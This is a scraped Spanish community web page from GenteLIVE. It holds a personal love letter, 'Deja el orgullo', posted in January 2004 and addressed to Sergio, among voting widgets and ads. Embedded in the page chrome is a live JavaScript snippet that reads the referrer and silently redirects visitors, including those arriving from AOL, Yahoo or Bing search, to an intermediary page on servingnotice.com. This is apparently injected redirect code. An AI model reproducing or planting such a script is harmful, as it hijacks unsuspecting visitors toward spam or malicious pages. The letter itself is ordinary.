Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Gasta bromas por teléfono a tus amigos y familiares.
Las mejores inocentadas para el 28 de diciembre
 

 
 
   

Carta

Deja el orgullo
[14-01-2004 15:42]

No lo leerás. Tú no entras aquí aunque sabes por mí que en el trabajo leo estas historias... ahora te escribo yo sin saber qué será de nosotros...yo fui poeta en algún tiempo pero contigo me quedé sin palabras. Es sólo contigo que he sentido tantas cosas nuevas, por ti he sufrido como por nadie, por ti he apostado por nuestro amor aún cuando hasta tú parecías renegar de él. Pero te he querido siempre, seguramente mucho antes de darme cuenta de que estabas aquí, tan dentro. Aún hoy hay días en los que se me olvida que te quiero y parece ser que sólo la rutina nos mantiene ahí, pero no, porque cuando siento que te pierdo sólo quiero volver a empezar... junto a ti.

Estos días de silencio las cosas más sencillas se convierten en tesoros: oir tu risa junto con la mía, acariciarte el pelo, levantarte por las mañanas, las exigencias que te hice se quedan en pretensiones absurdas. Y sé que tú sientes lo mismo por mí, que no es posible que no me eches de menos, que no puede darte igual que esto se nos pueda perder.

Por eso digo que dejes el orgullo a un lado, yo no lo tuve cada una de las veces en que fui a buscarte, si lo hubiera tenido hoy no estaríamos aquí, juntos. Deja el orgullo y no pienses que quise hacerte daño, si de verdad me has querido como dices quédate a mi lado que es lo que de corazón deseo.

Te quiero Sergio.


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda